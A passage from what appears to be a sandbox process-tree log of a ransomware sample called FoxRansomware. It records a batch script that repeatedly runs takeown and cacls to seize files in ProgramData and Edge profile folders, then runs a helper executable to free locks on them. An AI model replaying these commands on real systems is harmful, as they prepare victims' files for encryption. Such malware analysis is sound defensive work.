PID:4784

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
3⤵
PID:6080

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
3⤵
- Modifies file permissions
PID:5768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
3⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
4⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
2⤵
PID:6812

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
3⤵
PID:6976

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
3⤵
- Modifies file permissions
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
3⤵
PID:2676

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
4⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:3880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
2⤵
PID:1960

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
3⤵
PID:2072

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
3⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
3⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
4⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8ecccf90-f995-4b35-a6ac-0e074fb04a86.1.etl""
2⤵
PID:2692

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8ecccf90-f995-4b35-a6ac-0e074fb04a86.1.etl" /E /G Admin:F /C
3⤵
PID:4460

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8ecccf90-f995-4b35-a6ac-0e074fb04a86.1.etl"
3⤵
- Modifies file permissions
PID:5240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MoUsoCoreWorker.8ecccf90-f995-4b35-a6ac-0e074fb04a86.1.etl" -nobanner
3⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MoUsoCoreWorker.8ecccf90-f995-4b35-a6ac-0e074fb04a86.1.etl" -nobanner
4⤵
PID:7936

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f84036d6-2add-4507-ac30-87e8596a8d6f.1.etl""
2⤵
PID:7560

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f84036d6-2add-4507-ac30-87e8596a8d6f.1.etl" /E /G Admin:F /C
3⤵
PID:7636

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f84036d6-2add-4507-ac30-87e8596a8d6f.1.etl"
3⤵
- Modifies file permissions
PID:5144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "UpdateSessionOrchestration.f84036d6-2add-4507-ac30-87e8596a8d6f.1.etl" -nobanner
3⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "UpdateSessionOrchestration.f84036d6-2add-4507-ac30-87e8596a8d6f.1.etl" -nobanner
4⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\resources.pak""
2⤵
PID:1668

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\resources.pak" /E /G Admin:F /C
3⤵
PID:7376

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\resources.pak"
3⤵
PID:7916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resources.pak" -nobanner
3⤵
PID:5760

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resources.pak" -nobanner
4⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite""
2⤵
PID:5632

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite" /E /G Admin:F /C
3⤵
PID:5408

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite"
3⤵
PID:6024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "AssistanceHomeSQLite" -nobanner
3⤵
PID:7776

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "AssistanceHomeSQLite" -nobanner
4⤵
PID:7880

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0""
2⤵
PID:3004

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0" /E /G Admin:F /C
3⤵
PID:1544

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0"
3⤵
PID:5416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "data_0" -nobanner
3⤵
PID:7724

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "data_0" -nobanner
4⤵
PID:8056

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001""
2⤵
PID:1256

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001" /E /G Admin:F /C
3⤵
PID:7684

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001"
3⤵
PID:7348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MANIFEST-000001" -nobanner
3⤵
PID:8036

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MANIFEST-000001" -nobanner
4⤵
PID:7148

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge""
2⤵
PID:5228

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge" /E /G Admin:F /C
3⤵
PID:8076

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge"
3⤵
PID:5592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ExtensionActivityEdge" -nobanner
3⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ExtensionActivityEdge" -nobanner
4⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase""
2⤵
PID:5824

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase" /E /G Admin:F /C
3⤵
PID:5556

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase"
3⤵
- Modifies file permissions
PID:6884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "WebAssistDatabase" -nobanner
3⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "WebAssistDatabase" -nobanner
4⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3""
2⤵
PID:3344

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3" /E /G Admin:F /C
3⤵
PID:7772

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3"
3⤵
- Modifies file permissions
PID:6244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "data_3" -nobanner
3⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "data_3" -nobanner
4⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history""
2⤵
PID:5352

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history" /E /G Admin:F /C
3⤵
PID:6704

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history"
3⤵
- Modifies file permissions
PID:7704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "campaign_history" -nobanner
3⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "campaign_history" -nobanner
4⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index""
2⤵
PID:6756

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index" /E /G Admin:F /C
3⤵
PID:7240

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index"
3⤵
- Modifies file permissions
PID:6504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "index" -nobanner
3⤵
PID:2880

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "index" -nobanner
4⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4147d7b8-88a2-4b98-b60a-548d5fc298f6.1.etl""
2⤵
PID:3604

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4147d7b8-88a2-4b98-b60a-548d5fc298f6.1.etl" /E /G Admin:F /C
3⤵
PID:7732

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4147d7b8-88a2-4b98-b60a-548d5fc298f6.1.etl"
3⤵
PID:6544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "UpdateSessionOrchestration.4147d7b8-88a2-4b98-b60a-548d5fc298f6.1.etl" -nobanner
3⤵
PID:6588

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "UpdateSessionOrchestration.4147d7b8-88a2-4b98-b60a-548d5fc298f6.1.etl" -nobanner
4⤵
PID:6572

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm""
2⤵
PID:6864

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm" /E /G Admin:F /C
3⤵
PID:5516

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm"
3⤵
PID:6668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "load_statistics.db-shm" -nobanner
3⤵
PID:6412

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "load_statistics.db-shm" -nobanner
4⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.0092f7a7-2a22-4b7b-9ffc-af04130a26bd.1.etl""
2⤵
PID:6300

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.0092f7a7-2a22-4b7b-9ffc-af04130a26bd.1.etl" /E /G Admin:F /C
3⤵
PID:5960

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.0092f7a7-2a22-4b7b-9ffc-af04130a26bd.1.etl"
3⤵
- Modifies file permissions
PID:5672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "UpdateSessionOrchestration.0092f7a7-2a22-4b7b-9ffc-af04130a26bd.1.etl" -nobanner
3⤵
PID:6408

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "UpdateSessionOrchestration.0092f7a7-2a22-4b7b-9ffc-af04130a26bd.1.etl" -nobanner
4⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
2⤵
PID:6476

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
3⤵
PID:7012

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
3⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:296

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
2⤵
PID:6344

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
3⤵
PID:7100

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
3⤵
PID:7356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resource.xml" -nobanner
3⤵
PID:2424

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resource.xml" -nobanner
4⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.6e52fce6-af08-4bce-a733-cbfda67f9a56.1.etl""
2⤵
PID:5808

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.6e52fce6-af08-4bce-a733-cbfda67f9a56.1.etl" /E /G Admin:F /C
3⤵
PID:5296

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.6e52fce6-af08-4bce-a733-cbfda67f9a56.1.etl"
3⤵
- Modifies file permissions
PID:452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "WuProvider.6e52fce6-af08-4bce-a733-cbfda67f9a56.1.etl" -nobanner
3⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "WuProvider.6e52fce6-af08-4bce-a733-cbfda67f9a56.1.etl" -nobanner
4⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001""
2⤵
PID:7532

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001" /E /G Admin:F /C
3⤵
PID:5024

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001"
3⤵
PID:8148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MANIFEST-000001" -nobanner
3⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MANIFEST-000001" -nobanner
4⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager""
2⤵
PID:7352

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager" /E /G Admin:F /C
3⤵
PID:6216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager"
3⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "QuotaManager" -nobanner
3⤵
PID:2116

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "QuotaManager" -nobanner
4⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0""
2⤵
PID:224

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0" /E /G Admin:F /C
3⤵
PID:8152

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0"
3⤵
- Modifies file permissions
PID:6916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "data_0" -nobanner
3⤵
PID:7308

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "data_0" -nobanner
4⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9db5c4e2-6f54-4d1d-ba27-9920f236e52f.1.etl""
2⤵
PID:5772

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9db5c4e2-6f54-4d1d-ba27-9920f236e52f.1.etl" /E /G Admin:F /C
3⤵
PID:7260

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.9db5c4e2-6f54-4d1d-ba27-9920f236e52f.1.etl"
3⤵
PID:2316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "MoUsoCoreWorker.9db5c4e2-6f54-4d1d-ba27-9920f236e52f.1.etl" -nobanner
3⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "MoUsoCoreWorker.9db5c4e2-6f54-4d1d-ba27-9920f236e52f.1.etl" -nobanner
4⤵
PID:7540

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3""
2⤵
PID:5084

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3" /E /G Admin:F /C
3⤵
PID:5656

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3"
3⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "data_3" -nobanner
3⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "data_3" -nobanner
4⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7092

